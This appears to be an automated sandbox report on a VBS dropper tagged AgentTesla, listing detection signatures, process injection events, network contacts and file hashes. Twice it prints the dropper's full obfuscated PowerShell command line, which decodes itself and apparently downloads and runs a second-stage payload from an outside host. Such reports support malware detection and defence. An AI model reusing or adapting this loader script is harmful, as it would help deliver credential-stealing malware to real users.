Malware Analysis Report

2024-11-30 06:44

Sample ID 240604-bzzrxagg21
Target 83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs
SHA256 83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811
Tags
agenttesla keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811

Threat Level: Known bad

The file 83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger spyware stealer trojan

AgentTesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Detects executables referencing many email and collaboration clients. Observed in information stealers

Detects executables referencing Windows vault credential objects. Observed in infostealers

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers

Detects executables referencing many file transfer clients. Observed in information stealers

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-04 01:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-04 01:35

Reported

2024-06-04 01:38

Platform

win7-20240221-en

Max time kernel

141s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing Windows vault credential objects. Observed in infostealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many file transfer clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1740 set thread context of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1612 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2612 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1740 wrote to memory of 2028 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$aminosyrerne = 1;Function Tarn($Sphagnumen){$Colitoxemia=$Sphagnumen.Length-$aminosyrerne;$digtsamlingernesterately='Substring';For( $digtsamlingernes=5;$digtsamlingernes -lt $Colitoxemia;$digtsamlingernes+=6){$Andantinoers+=$Sphagnumen.$digtsamlingernesterately.Invoke( $digtsamlingernes, $aminosyrerne);}$Andantinoers;}function Bzer($Ranglesten101){ & ($Giverens) ($Ranglesten101);}$Sansningerne=Tarn 'UnlexMImplioAnastzUf,rbiBrne lS,aaslm.nagaOve,h/K,nsu5Pou.t. Eksp0Cambo Klve( NedbW OveriTzet nKrigsdbehagoFlleswHver,sGldel ShrimNHovedTGrouc ,emon1Argum0P,eje.Pho,a0Wrich;Are p DiscoWP.troiBlazonklver6 Inds4Patro;Efte. ,nnexDyrlg6Evang4,uali;woolh Navngr KaruvPrd.k:Pinde1 orfa2 Alfa1Harpi.Emuss0Forne)Em.ed LogikGDrun,ePreedcKvotekAll.noUu,dg/afear2Dayma0Lag,r1Lenti0Shrie0Digit1N.nex0Wom e1 Mine AfteF queri MothrPissoe saltfLaithoEventx Berb/Apoca1Wagon2Kursu1ev,lu.Apopl0Bethy ';$Rusgifte=Tarn 'EcuadU SangsKreereR.tarrObser-FlertAHypsogInak eSchranCephat U.in ';$Brnefonden215=Tarn 'Mum eh Nonlt,pinst ClaupFred.sFemme:Binde/ fare/Nig twFiffewMoniswPinet.BechaiTim rnMorbrn,yntho Afskv BangaKaneltRedegi remvDefaieFanfabSupe uOasthiSkorslFriordElektiTolngnForfjgHydats likoLogorlSwin,uchaett ConiiFenylo KefinFor,ns rthr. SortiStophnMilie/Dryp.wAmortpLyenc-Cen acOvercoNarkonDynamtDepreeTormenamountLand,/,nolduMaggap Gulll StavoVomeraAn.itd fremsSlud,/MlkeagForesrPensiaS.bfevGdskeiAfhugt Tilpy Tabt_alvirfPhospoSpoonrk.avem ReprsMinkf/ haanhSyndi/ St,udForel/ iffebKnur /ForfogFasan/A.triCAmbigrC,tecuErantrVinekeWhipsu ymbas,vera2 ecli3Cauda8Gambi. T.melPrin zColouhGlutt ';$Catapan245=Tarn 'Squam>Sempl ';$Giverens=Tarn 'In.eri Ins eKuldkx,krif ';$Forsrgernes='Retningsstabile';$Sengetjsskuffes = Tarn 'Mellee AuricTyde.hnons.oWahin hrow%scelpaSp ndpUnhisp DisndNoseladetect Ref aBilli%.irgi\Cargoe CathtSkopuhGooseiNybegcRognoiSippesDonatiBetonnskildgSuppr.BerygTLawy.oKandigOlymp Pynt&Uenga&Overv KundeeBeatecMyxoshGokaro A,ve Teri.tTrian ';Bzer (Tarn 'Lsel,$B elbgTheomlRederoK.detbF ugta AcrolDeput:Lew.nU,fterkG,imioAdempm Sph,pRiftelP loreShleptTeksttStukseRibon=Taske( relacRachimAllusd Marg Morti/TigercUnder Mech $ ntivSGejste mmen AvicgU dere Hur,tSemiej Gigsscatocs SkelkD.linuMon.cfAs igf expeeS.avns Barl)Mynte ');Bzer (Tarn 'galma$ RayagAkvarlSagfroBeffrb Aarea arual eli:P,ddeSDivettMand,ahenvitInt,oiUde.roMezainC.huir Intee yls=A,kiv$ Ta,iBPrevarAc.elnParageTrichf Ma.ko a cenKoombdN.uroeLibelnAcuae2R,ste1Outpu5P,ogr.C,kadsMetacpUne tl Aa.niFlitttNonpr(.sgar$ Ba.eCCe.soaimpert aandaEphympnissea.ypomnTi.mp2 Porc4Nunci5plumo) Inse ');$Brnefonden215=$Stationre[0];$Injurier= (Tarn 'Ne,er$ regug SpinlOrdreoLaurub IndoaKon,elPlebs:arbtrH,hariuNondimRap caPlastnTheopiUn,resLappetBackfeDise,rAffra=Mate Nr vayeRentrwVina,-MinusOSubcobDetacjDecreeB.rytcDi ettSprit BrystSDeaveyExtr,sBeneftap.eteMishamWhims.BilleNSiv.ieTyk,ttExtir.Pos,eWFallieMustyb ,dmiCPredilPsalmiSulpheFragan S ynt');$Injurier+=$Ukomplette[1];Bzer ($Injurier);Bzer (Tarn ' Indi$SvensHUnexpuDermam kadeaDiffunCo,ori LivesDiscrtUdsaleAarstrTikol.AfpilH.orlyeExtraaSptm.d .esse MasorK rens Taxw[ ntid$Se reR iaaru,ragrsResungwhortiCorpsfG,asstVitase Disc]Store=Frai $ UndeSStripaSpri n P oasPerson ,orfiMe,ron SidegSiau.eDeco rUteronKrysteZooph ');$delegatens=Tarn 'Undef$Kala,HU,deruStudimSejrsa FermnFiliciSmid.sGaffet Veste Re orSquam..eukeDNorm o Amphw SubvnJoinelS.illoprof a L.gedB,ahmFWa laiPupillGurshe Post(J,set$FlertB RelarExamin.eligetaarefSkl.eoa,dernPr.cldKopifeerfarnLi.it2trivi1Jager5 Jaw,,Etike$ AffaBEnolooBegl,rBvsendBoileePost lUns alAngiveNeedmtSupers Worm) Subs ';$Bordellets=$Ukomplette[0];Bzer (Tarn 'Jernb$Drejng Chatl Talio Ups.bStetha DiaplAngre:jordfLKoorda Bekoa L xasTermieTroldm Sj fe PatikWoonoaFore nBaggeiSprydsStillm NonceSunberHystesBevom= S,oh(,iswaTSt,mmeAnatesTelent Star- P acP PropaIbe.etAdlumhForni Dalem$GererB Mi,to Tr.grUnsnad RefleJol,hl synklSp rae I bltMelo,sMaksi) ette ');while (!$Laasemekanismers) {Bzer (Tarn 'Ssl n$,ypocgabsurl KlimoStudibinfana ovarlNedvu:PerisGBebrea BrynsSendetXanthrFlle.oCottoebeston anktP,alteNeutrrK.rtooRe,solSpygao Ch.lgTe stiLubcks YdertNonca=tileg$LammetAnn.crSammeuAndereVersi ') ;Bzer $delegatens;Bzer (Tarn ' FinaSPensitUnfloaOptiorSpraitHelse-ArbejSS,idslChifreAnt,meKnapspMarxi Medi4Etmaa ');Bzer (Tarn 'Aster$ robg G atlNutteo hydrbTimetaSnaksl Moso:Immu LMedieaInq.iaAfsejsRaptueYewsamTildneMal akAfs.eaafpronIns.riMot.rs.magemHarmeeSkjorrBort s Remo=Re.ts(CrossT StudeBogkasTiaa tMolek-GanglPRetroaHosiotPsilah .rek Resi$FactoBTo.icoHeniqrO.bytdprecoe G mml.rhanlSkov.eRignitgeomas Pa.d)Sam.e ') ;Bzer (Tarn ' u.re$EnspngDvblelCon.iobesmob.alypaalepolOutfo:Cap eH.olisu StersAnegrsTakkeiMitertI,baaese,in=Prfer$St.ofgGge alRestaoSambab RallaClintlProte:Dele FLamdaoUdfr,rSchenmT,arso Dj vdisostnAncesi Belvn psycg Skove.ontrrSheld+B fin+Hy,er% Jule$ InteS Pa,etRorsmaAllertAdminiScoggoPrecln DeterDeltae,onfo.Distrc Overoeskilu SubvnCompetSmoot ') ;$Brnefonden215=$Stationre[$Hussite];}$Undervisningspligt=319778;$Tekstblok=29552;Bzer (Tarn 'Ve.ti$Kine,gUnsigltamilo .shabUneq aT.xaclStato:AntifAF ihefTa.etb Ar haOpi igReprsnSvaliiProkinOpsergscr.peSublinFor a1Ironi0Norgi9Snery Sortk= Char PhoraG Si.dePolitt emi- OssiCSkyldoBomban.ambutSr ebeMacadn WeattOv,ra Visar$CorroBI,dero UnsarAu,undSk,ldeVe.belMickelUe,ige psilt Wea sKulmu ');Bzer (Tarn 'Srskr$UnwargMill,lStereo dovebNondea Ela.lNig.e:Vas.ekbar,toEarninphor s Sul,iStjkigDj,ven S,oraBrightndtesiS rgto leasntemp.elrkerrSpytosRever Pasta= Knev Saddu[DentiSa hamyLyskosDamentdanseeSlusemgloom.Otio C,uktioKlkkenRob.svperifeTorskrr,strtStaab]Kulan:Notep:BegrnFEfph rSmugro ,bonmFriorBSubela Per.s,nmise Sept6ar ou4ruds.SAmp lt Or srKnebliEpidenScaffgSkoli(Ine.f$FortrATrustfProclbm,eteaSidesgJeepenHoun,iFreesnBaldagF.brieCheffnHomek1Splor0 ompu9 Oari)S,abs ');Bzer (Tarn 'Strid$ho jsg T,pplSindro Ska.bTsemiaNeur,l.hlor:RafraMSubfoiDistalbi,dilMdeafczazena Pr dkEpiceeLochi Ne.kh=Aeros Ane,i[SinapS G ovy tieisCiseltRetsae nhedmSmirc.I.digTEmigreBesnrxPhenyt Horn.Hus,eE.rstanStyricMar,koRegurd Sim,iMatrin oldlgCrabe]Fo ke:bluff:S.altAParasSJakeyCFo etIPopolIBurro..isreGF uttef,uidtScoreS .etetRutsjrR ppoiat,einIndbagSanse(inten$Gri,lkRottooRussenSeminsDegraiDihydgPseudnSprogaUnpostOmkariE,otto Pr.onhent.eScr.tr TavesFortv)Modpo ');Bzer (Tarn ' Pa l$Udrivg ExcelSeraso KlorbJobbeaSideolUlovm: NongBHjemml,urenobologtTrochlKonfig,utuan SpotikldebnPaddog,rndeeTur onVagt =R pud$unpenMFr gtiBobbel P.etlOrdincVespiaCucu,k IncoeUrvrk.Haftos St,nu.agerbFarvesChristEmulgrRi,egi H,drnRefungDialy(Kat s$TrdepU CentnFillidforsheSmrbirIso,rvHestei Nosts Paa,nHudeniM,hamnVakangKva,rs E topKanerlWhosoiOverfgplumptPaa,i,Vest $Dele TEpileeForh.k.ensdsFot.ttArranbUdtvrlCon.io .atekIntro)Misin ');Bzer $Blotlgningen;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$aminosyrerne = 1;Function Tarn($Sphagnumen){$Colitoxemia=$Sphagnumen.Length-$aminosyrerne;$digtsamlingernesterately='Substring';For( $digtsamlingernes=5;$digtsamlingernes -lt $Colitoxemia;$digtsamlingernes+=6){$Andantinoers+=$Sphagnumen.$digtsamlingernesterately.Invoke( $digtsamlingernes, $aminosyrerne);}$Andantinoers;}function Bzer($Ranglesten101){ & ($Giverens) ($Ranglesten101);}$Sansningerne=Tarn 'UnlexMImplioAnastzUf,rbiBrne lS,aaslm.nagaOve,h/K,nsu5Pou.t. Eksp0Cambo Klve( NedbW OveriTzet nKrigsdbehagoFlleswHver,sGldel ShrimNHovedTGrouc ,emon1Argum0P,eje.Pho,a0Wrich;Are p DiscoWP.troiBlazonklver6 Inds4Patro;Efte. ,nnexDyrlg6Evang4,uali;woolh Navngr KaruvPrd.k:Pinde1 orfa2 Alfa1Harpi.Emuss0Forne)Em.ed LogikGDrun,ePreedcKvotekAll.noUu,dg/afear2Dayma0Lag,r1Lenti0Shrie0Digit1N.nex0Wom e1 Mine AfteF queri MothrPissoe saltfLaithoEventx Berb/Apoca1Wagon2Kursu1ev,lu.Apopl0Bethy ';$Rusgifte=Tarn 'EcuadU SangsKreereR.tarrObser-FlertAHypsogInak eSchranCephat U.in ';$Brnefonden215=Tarn 'Mum eh Nonlt,pinst ClaupFred.sFemme:Binde/ fare/Nig twFiffewMoniswPinet.BechaiTim rnMorbrn,yntho Afskv BangaKaneltRedegi remvDefaieFanfabSupe uOasthiSkorslFriordElektiTolngnForfjgHydats likoLogorlSwin,uchaett ConiiFenylo KefinFor,ns rthr. SortiStophnMilie/Dryp.wAmortpLyenc-Cen acOvercoNarkonDynamtDepreeTormenamountLand,/,nolduMaggap Gulll StavoVomeraAn.itd fremsSlud,/MlkeagForesrPensiaS.bfevGdskeiAfhugt Tilpy Tabt_alvirfPhospoSpoonrk.avem ReprsMinkf/ haanhSyndi/ St,udForel/ iffebKnur /ForfogFasan/A.triCAmbigrC,tecuErantrVinekeWhipsu ymbas,vera2 ecli3Cauda8Gambi. T.melPrin zColouhGlutt ';$Catapan245=Tarn 'Squam>Sempl ';$Giverens=Tarn 'In.eri Ins eKuldkx,krif ';$Forsrgernes='Retningsstabile';$Sengetjsskuffes = Tarn 'Mellee AuricTyde.hnons.oWahin hrow%scelpaSp ndpUnhisp DisndNoseladetect Ref aBilli%.irgi\Cargoe CathtSkopuhGooseiNybegcRognoiSippesDonatiBetonnskildgSuppr.BerygTLawy.oKandigOlymp Pynt&Uenga&Overv KundeeBeatecMyxoshGokaro A,ve Teri.tTrian ';Bzer (Tarn 'Lsel,$B elbgTheomlRederoK.detbF ugta AcrolDeput:Lew.nU,fterkG,imioAdempm Sph,pRiftelP loreShleptTeksttStukseRibon=Taske( relacRachimAllusd Marg Morti/TigercUnder Mech $ ntivSGejste mmen AvicgU dere Hur,tSemiej Gigsscatocs SkelkD.linuMon.cfAs igf expeeS.avns Barl)Mynte ');Bzer (Tarn 'galma$ RayagAkvarlSagfroBeffrb Aarea arual eli:P,ddeSDivettMand,ahenvitInt,oiUde.roMezainC.huir Intee yls=A,kiv$ Ta,iBPrevarAc.elnParageTrichf Ma.ko a cenKoombdN.uroeLibelnAcuae2R,ste1Outpu5P,ogr.C,kadsMetacpUne tl Aa.niFlitttNonpr(.sgar$ Ba.eCCe.soaimpert aandaEphympnissea.ypomnTi.mp2 Porc4Nunci5plumo) Inse ');$Brnefonden215=$Stationre[0];$Injurier= (Tarn 'Ne,er$ regug SpinlOrdreoLaurub IndoaKon,elPlebs:arbtrH,hariuNondimRap caPlastnTheopiUn,resLappetBackfeDise,rAffra=Mate Nr vayeRentrwVina,-MinusOSubcobDetacjDecreeB.rytcDi ettSprit BrystSDeaveyExtr,sBeneftap.eteMishamWhims.BilleNSiv.ieTyk,ttExtir.Pos,eWFallieMustyb ,dmiCPredilPsalmiSulpheFragan S ynt');$Injurier+=$Ukomplette[1];Bzer ($Injurier);Bzer (Tarn ' Indi$SvensHUnexpuDermam kadeaDiffunCo,ori LivesDiscrtUdsaleAarstrTikol.AfpilH.orlyeExtraaSptm.d .esse MasorK rens Taxw[ ntid$Se reR iaaru,ragrsResungwhortiCorpsfG,asstVitase Disc]Store=Frai $ UndeSStripaSpri n P oasPerson ,orfiMe,ron SidegSiau.eDeco rUteronKrysteZooph ');$delegatens=Tarn 'Undef$Kala,HU,deruStudimSejrsa FermnFiliciSmid.sGaffet Veste Re orSquam..eukeDNorm o Amphw SubvnJoinelS.illoprof a L.gedB,ahmFWa laiPupillGurshe Post(J,set$FlertB RelarExamin.eligetaarefSkl.eoa,dernPr.cldKopifeerfarnLi.it2trivi1Jager5 Jaw,,Etike$ AffaBEnolooBegl,rBvsendBoileePost lUns alAngiveNeedmtSupers Worm) Subs ';$Bordellets=$Ukomplette[0];Bzer (Tarn 'Jernb$Drejng Chatl Talio Ups.bStetha DiaplAngre:jordfLKoorda Bekoa L xasTermieTroldm Sj fe PatikWoonoaFore nBaggeiSprydsStillm NonceSunberHystesBevom= S,oh(,iswaTSt,mmeAnatesTelent Star- P acP PropaIbe.etAdlumhForni Dalem$GererB Mi,to Tr.grUnsnad RefleJol,hl synklSp rae I bltMelo,sMaksi) ette ');while (!$Laasemekanismers) {Bzer (Tarn 'Ssl n$,ypocgabsurl KlimoStudibinfana ovarlNedvu:PerisGBebrea BrynsSendetXanthrFlle.oCottoebeston anktP,alteNeutrrK.rtooRe,solSpygao Ch.lgTe stiLubcks YdertNonca=tileg$LammetAnn.crSammeuAndereVersi ') ;Bzer $delegatens;Bzer (Tarn ' FinaSPensitUnfloaOptiorSpraitHelse-ArbejSS,idslChifreAnt,meKnapspMarxi Medi4Etmaa ');Bzer (Tarn 'Aster$ robg G atlNutteo hydrbTimetaSnaksl Moso:Immu LMedieaInq.iaAfsejsRaptueYewsamTildneMal akAfs.eaafpronIns.riMot.rs.magemHarmeeSkjorrBort s Remo=Re.ts(CrossT StudeBogkasTiaa tMolek-GanglPRetroaHosiotPsilah .rek Resi$FactoBTo.icoHeniqrO.bytdprecoe G mml.rhanlSkov.eRignitgeomas Pa.d)Sam.e ') ;Bzer (Tarn ' u.re$EnspngDvblelCon.iobesmob.alypaalepolOutfo:Cap eH.olisu StersAnegrsTakkeiMitertI,baaese,in=Prfer$St.ofgGge alRestaoSambab RallaClintlProte:Dele FLamdaoUdfr,rSchenmT,arso Dj vdisostnAncesi Belvn psycg Skove.ontrrSheld+B fin+Hy,er% Jule$ InteS Pa,etRorsmaAllertAdminiScoggoPrecln DeterDeltae,onfo.Distrc Overoeskilu SubvnCompetSmoot ') ;$Brnefonden215=$Stationre[$Hussite];}$Undervisningspligt=319778;$Tekstblok=29552;Bzer (Tarn 'Ve.ti$Kine,gUnsigltamilo .shabUneq aT.xaclStato:AntifAF ihefTa.etb Ar haOpi igReprsnSvaliiProkinOpsergscr.peSublinFor a1Ironi0Norgi9Snery Sortk= Char PhoraG Si.dePolitt emi- OssiCSkyldoBomban.ambutSr ebeMacadn WeattOv,ra Visar$CorroBI,dero UnsarAu,undSk,ldeVe.belMickelUe,ige psilt Wea sKulmu ');Bzer (Tarn 'Srskr$UnwargMill,lStereo dovebNondea Ela.lNig.e:Vas.ekbar,toEarninphor s Sul,iStjkigDj,ven S,oraBrightndtesiS rgto leasntemp.elrkerrSpytosRever Pasta= Knev Saddu[DentiSa hamyLyskosDamentdanseeSlusemgloom.Otio C,uktioKlkkenRob.svperifeTorskrr,strtStaab]Kulan:Notep:BegrnFEfph rSmugro ,bonmFriorBSubela Per.s,nmise Sept6ar ou4ruds.SAmp lt Or srKnebliEpidenScaffgSkoli(Ine.f$FortrATrustfProclbm,eteaSidesgJeepenHoun,iFreesnBaldagF.brieCheffnHomek1Splor0 ompu9 Oari)S,abs ');Bzer (Tarn 'Strid$ho jsg T,pplSindro Ska.bTsemiaNeur,l.hlor:RafraMSubfoiDistalbi,dilMdeafczazena Pr dkEpiceeLochi Ne.kh=Aeros Ane,i[SinapS G ovy tieisCiseltRetsae nhedmSmirc.I.digTEmigreBesnrxPhenyt Horn.Hus,eE.rstanStyricMar,koRegurd Sim,iMatrin oldlgCrabe]Fo ke:bluff:S.altAParasSJakeyCFo etIPopolIBurro..isreGF uttef,uidtScoreS .etetRutsjrR ppoiat,einIndbagSanse(inten$Gri,lkRottooRussenSeminsDegraiDihydgPseudnSprogaUnpostOmkariE,otto Pr.onhent.eScr.tr TavesFortv)Modpo ');Bzer (Tarn ' Pa l$Udrivg ExcelSeraso KlorbJobbeaSideolUlovm: NongBHjemml,urenobologtTrochlKonfig,utuan SpotikldebnPaddog,rndeeTur onVagt =R pud$unpenMFr gtiBobbel P.etlOrdincVespiaCucu,k IncoeUrvrk.Haftos St,nu.agerbFarvesChristEmulgrRi,egi H,drnRefungDialy(Kat s$TrdepU CentnFillidforsheSmrbirIso,rvHestei Nosts Paa,nHudeniM,hamnVakangKva,rs E topKanerlWhosoiOverfgplumptPaa,i,Vest $Dele TEpileeForh.k.ensdsFot.ttArranbUdtvrlCon.io .atekIntro)Misin ');Bzer $Blotlgningen;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ethicising.Tog && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.innovativebuildingsolutions.in udp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
IN 103.21.58.98:443 www.innovativebuildingsolutions.in tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp

Files

memory/2612-4-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp

memory/2612-5-0x000000001B100000-0x000000001B3E2000-memory.dmp

memory/2612-6-0x0000000002490000-0x0000000002498000-memory.dmp

memory/2612-7-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-8-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-9-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-10-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-11-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2612-12-0x000007FEF54FE000-0x000007FEF54FF000-memory.dmp

memory/2612-13-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15NK86W7HSGMM82OWR82.temp

MD5 bbaab6097aed2824bb53cea5c3914838
SHA1 476d90850c849e8b177de936c52be42d7e023e5f
SHA256 87dbb34cdafb3ae97785a700d4bb96063acc73a92893f2c1e4e80e034e5dece6
SHA512 37ff7cf082084712141f840c43e891d079cbb69e0ca7d289e0c69ec2e60fdded381deff29b8849b1fb631ea6aa4920cbc7c3667e5af02ba782a7481506699c9b

C:\Users\Admin\AppData\Roaming\ethicising.Tog

MD5 378d952dc2d926ae171fae5b67cc5e10
SHA1 45e58c20248765d52ed3ebf9b3f8923acf793c5e
SHA256 03c5a0bdba00f06681c1c34fb584ef80cf2901b789aee503a221456b20b942dc
SHA512 b177709a408f26bfc6a38a3763416477d34fb64f78e1a81c5a458849787737d6ea1e515933b88396f6107938203c654011f2e4b3b269c0b7b34d979310bf4e68

memory/1740-20-0x00000000062E0000-0x0000000008358000-memory.dmp

memory/2028-34-0x0000000000220000-0x0000000001282000-memory.dmp

memory/2612-35-0x000007FEF5240000-0x000007FEF5BDD000-memory.dmp

memory/2028-36-0x0000000000220000-0x0000000000260000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-04 01:35

Reported

2024-06-04 01:38

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83858356d39e4457babbc4f7c370d60cfc7ef83d4c8899fba40936707984a811.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing Windows vault credential objects. Observed in infostealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
